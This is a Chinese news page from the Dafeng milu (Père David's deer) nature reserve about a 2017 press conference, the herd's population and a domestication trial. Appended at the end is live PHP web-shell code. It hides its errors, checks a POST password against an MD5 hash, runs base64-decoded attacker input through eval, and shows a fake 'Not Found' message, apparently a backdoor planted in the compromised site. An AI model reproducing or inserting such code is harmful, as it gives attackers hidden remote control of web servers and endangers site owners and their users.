最新要闻

首页 > 最新要闻 >

    保护区召开2017鹿王争霸赛现场直播新闻发布会

               由江苏大丰麋鹿国家级自然保护区与盐城电视台合作举办的2017年鹿王争霸现场直播新闻发布会于6月12日在中华麋鹿园游客中心召开。盐城市大丰区政协主席袁国萍,盐城市大丰区委常委、宣传部长石根美,江苏大丰麋鹿国家级自然保护区管理处副主任沈华出席此次发布会。

     

    新华日报、扬子晚报、现代快报、新华网、人民网、今日头条、网易新闻、盐阜大众报等媒体高度关注发布会盛况,纷纷出席并且全程拍摄。

    发布会伊始,由大丰区政协主席袁国萍介绍整个大丰区的旅游发展情况。袁主席介绍,大丰目前处于旅游业高速发展的时代,拥有苏北第一家国家5A级旅游景区——中华麋鹿园。在整个发展过程中,中华麋鹿园景区发挥5A景区的带头作用,服务质量上乘、基础设施完善,是大丰旅游业发展亮丽的名片。

    江苏大丰麋鹿国家级自然保护区副主任沈华同志介绍保护区相关情况。沈主任表示2017年大丰麋鹿保护区麋鹿产仔顺利结束,麋鹿种群数量达4101头,总数占世界60%以上,是世界上最大的麋鹿种群。大丰麋鹿保护区的麋鹿难产率位于世界最低,2017年新生仔鹿786头,创历史新高。野外种群数量增至846头,是世界上最大的麋鹿野外种群。近年来,大丰麋鹿保护区有效开展科研保护工作,科学制定《大丰麋鹿种群管理方案》,有效克服麋鹿种群密度过大、栖息地植被退化、疫病易发等突出问题,进一步优化协调生态保护与经济发展的关系,争取各方力量,齐抓共管,共同建设黄海湿地麋鹿家园。

    保护区为更好地保护、研究麋鹿,攻克近亲障碍、防控疫病、开拓有效利用、实现科普展示功能开始麋鹿驯养试验。该项目是经国家林业局批准,取得人工驯养繁殖许可证的一个项目。

    保护区争取花半年的时间,建立麋鹿人工驯养种群。这个项目的开展是在麋鹿基因学、遗传学、繁殖育种学、营养学、生理生化、疫病防控以及迁地保护等科学研究方面的一个尝试。该项目如果成功,将会为麋鹿的饲养管理、人工驯养繁殖提供一个科学依据;为今后麋鹿种群的繁殖扩群、精细化管理积累科研技术资料;为麋鹿远缘基因交换、建立麋鹿种群可持续发展建立物种基因库。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>